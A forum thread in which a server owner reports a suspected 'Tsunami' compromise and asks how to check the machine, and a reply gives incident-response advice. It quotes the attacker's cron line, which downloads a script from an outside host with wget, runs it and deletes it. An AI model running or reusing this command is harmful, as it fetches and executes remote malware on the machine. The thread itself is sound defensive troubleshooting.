suspected victim of Tsunami exploit

Regards,

since my server acted "weird" lately (pulling high bandwith during my nighttimes in spikes, then automatically stopping for the past few days) I inspected the server and found a crontab which pulled regular.bot from stablehost.us

@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

A quick google search led me to the following CentOs (I'm running Debian) forum page:

https://www.centos.org/forums/viewtopic … 17&t=48804">https://www.centos.org/forums/viewtopic.php?f=17&t=48804

Looking through my device in /tmp there are no scripts which shouldn't belong as far as I can see:

root@ragnarok:/tmp# ls -alh
total 24K
drwxrwxrwt  6 root root    4.0K Jan  4 13:45 .
drwxr-xr-x 24 root root    4.0K Jan  4 05:14 ..
drwxrwxrwt  2 root root    4.0K Dec 23 23:39 .ICE-unix
drwxrwxrwt  2 root root    4.0K Dec 23 23:39 .X11-unix
-rw-r--r--  1 root root       0 Jan  4 13:16 .sh
drwxr-xr-x  2 root root    4.0K Dec 23 23:39 .webmin

Anyone able to provide more info with a means to make sure the system is clean ?

I know the best course of action would be to scrap the server and start over. This is scheduled but I currently don't yet have the time for it so if I could make sure it's not a threat at this minute, I could build the new machine on the scheduled time.

Regards,

2 Replies

The crontab runs the script and then deletes it, which is why you don't see a file in /tmp. While the script is running, Linux keeps the file in memory even though it doesn't have a name any longer.

I haven't looked at this particular script to see if it uses any other tricks to hide itself, but you need to consider the entire system as being compromised - what are the chances that only one malicious actor found an exploit?

Without knowing how your attacker first compromised your system, it's difficult to determine if your system is clean.

Search all your logs, command histories, etc. Search for all new files on your server and examine them to make sure they are not backdoors.

Reply

Please enter an answer
Tips:

You can mention users to notify them: @username

You can use Markdown to format your question. For more examples see the Markdown Cheatsheet.

> I’m a blockquote.

I’m a blockquote.

[I'm a link] (https://www.google.com)

I'm a link

**I am bold** I am bold

*I am italicized* I am italicized

Community Code of Conduct